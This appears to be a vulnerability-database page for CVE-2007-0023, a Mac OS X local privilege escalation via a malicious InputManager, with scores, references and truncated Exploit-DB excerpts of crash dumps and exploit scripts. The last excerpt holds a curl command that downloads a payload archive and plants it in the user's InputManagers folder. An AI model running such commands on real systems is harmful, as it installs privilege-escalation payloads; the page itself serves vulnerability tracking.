CVE-2007-0023
published 2007-01-24CVE-2007-0023: The CFUserNotificationSendRequest function in UserNotificationCenter.app in Apple Mac OS X 10.4.8, when used in combination with diskutil, allows local users…
PriorityP425medium6.9CVSS 2.0
AVLACMAuNCCICAC
EXPLOIT
EPSS
1.54%
71.7th percentile
The CFUserNotificationSendRequest function in UserNotificationCenter.app in Apple Mac OS X 10.4.8, when used in combination with diskutil, allows local users to gain privileges via a malicious InputManager in Library/InputManagers in a user's home directory, which is executed when Cocoa applications attempt to notify the user.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Office 2007 - Malformed Document Stack Buffer Overflow
exploitdb·2015-08-25
CVE-2015-0064 Microsoft Office 2007 - Malformed Document Stack Buffer Overflow
Microsoft Office 2007 - Malformed Document Stack Buffer Overflow
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=170&can=1
The following access violation was observed in Microsoft Office 2007
(Word document):
(e24.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0583a748 ebx=00eb4684 ecx=003ad1a3 edx=00000000 esi=049860bc edi=00122238
eip=7814500a esp=001221e0 ebp=001221e8 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
MSVCR80!memcpy+0x5a:
7814500a f3a5 rep movsd ds:049860bc=???????? es:00122238=3348bcd8
0:000> k
ChildEBP RetAddr
001221e8 31249c0e MSVCR80!memcpy+0x5a
00122204 3126a371 wwlib!
Exploit-DB
Microsoft Office 2007 - OneTableDocumentStream Invalid Object
exploitdb·2015-08-25
CVE-2015-0065 Microsoft Office 2007 - OneTableDocumentStream Invalid Object
Microsoft Office 2007 - OneTableDocumentStream Invalid Object
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=171&can=1
The following access violation was observed in Microsoft Office 2007
(Word document):
(8c0.e68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012dcf8 ebx=40000000 ecx=40000000 edx=0012de1c esi=40000000 edi=011f1400
eip=32881800 esp=0012d010 ebp=0012d038 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mso!Ordinal7799+0x2fc:
32881800 0fb74614 movzx eax,word ptr [esi+0x14] ds:0023:40000014=????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following
Exploit-DB
Microsoft PowerPoint 2007 - Crash (PoC)
exploitdb·2013-07-01
CVE-2014-2671 Microsoft PowerPoint 2007 - Crash (PoC)
Microsoft PowerPoint 2007 - Crash (PoC)
---
# Title : Microsoft Office PowerPoint 2007 Crash PoC
# Date: 2013-01-12
# Software Link: http://office.microsoft.com/
# Author: Asesino04
# Tested on: Windows XP SP2
# Special Thanks To : Ness Oum El Bouaghi
# Bug Description:
when you insert a sound to Microsoft office powerpoint 2007 ;the software will get crashed
it tested on office 2007 ,all the versions may be affected too
# Credit: This Bug was founded by Asesino04 "The Black Devils"
# Proof Of Concept
https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-prn1/601368_541967942509686_881180451_n.jpg
/-->
EAX FFFFFFFF
ECX 00000000
EDX 00000000
EBX 0003DAD8
ESP 0013BC5C
EBP 0013BCF0
ESI FFFFFFFF
EDI 00199FF2
EIP 0460E650 quartz.0460E650
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(
Exploit-DB
CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service
exploitdb·2007-02-01
CVE-2007-0816 CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service
CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service
---
#!/usr/bin/ruby
#
# Computer Associates (CA) Brightstor Backup Remote Procedure Call Server DoS (catirpc.dll)
#
# Catirpc.exe - Provides the endpoint mapper and enables RPC services for BrightStor Backup products.
#
# (7c.350): Access violation - code c0000005 (!!! second chance !!!)
# eax=007ef924 ebx=2e009560 ecx=00325ad8 edx=007ef900 esi=00000000 edi=00324308
# eip=2e00eda8 esp=007ef8b8 ebp=2e00be00 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
# *** WARNING: Unable to verify checksum for C:\Program Files\CA\BrightStor ARCserve
# Backup\CATIRPC.dll
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program
# Files\CA\BrightStor A
Exploit-DB
Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Local Privilege Escalation
exploitdb·2007-01-23
CVE-2007-0023 Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Local Privilege Escalation
Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Local Privilege Escalation
---
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre
# Lance M. Havok
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#
require 'fileutils'
bugselected = (ARGV[0] || 0).to_i
# INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
# keeping a local backup. /str0ke
INPUTMANAGER_URL = "https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3181.tar.gz"
INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
"mkdir -p ~/Library/InputManagers/;" +
"cd ~/Library/InputManagers/;" +
"tar -zxvf /tmp/moab_im.tar.gz"
case bugselected
when 0
target_url = "http://projects.info-pull.com/
No writeups or analysis indexed.
http://docs.info.apple.com/article.html?artnum=305102http://lists.apple.com/archives/Security-announce/2007/Feb/msg00000.htmlhttp://projects.info-pull.com/moab/MOAB-22-01-2007.htmlhttp://secunia.com/advisories/23846http://secunia.com/advisories/24198http://securitytracker.com/id?1017542http://www.kb.cert.org/vuls/id/315856http://www.osvdb.org/32695http://www.securityfocus.com/bid/22188http://www.us-cert.gov/cas/techalerts/TA07-047A.htmlhttp://www.vupen.com/english/advisories/2007/0074https://exchange.xforce.ibmcloud.com/vulnerabilities/31676http://docs.info.apple.com/article.html?artnum=305102http://lists.apple.com/archives/Security-announce/2007/Feb/msg00000.htmlhttp://projects.info-pull.com/moab/MOAB-22-01-2007.htmlhttp://secunia.com/advisories/23846http://secunia.com/advisories/24198http://securitytracker.com/id?1017542http://www.kb.cert.org/vuls/id/315856http://www.osvdb.org/32695http://www.securityfocus.com/bid/22188http://www.us-cert.gov/cas/techalerts/TA07-047A.htmlhttp://www.vupen.com/english/advisories/2007/0074https://exchange.xforce.ibmcloud.com/vulnerabilities/31676
2007-01-24
Published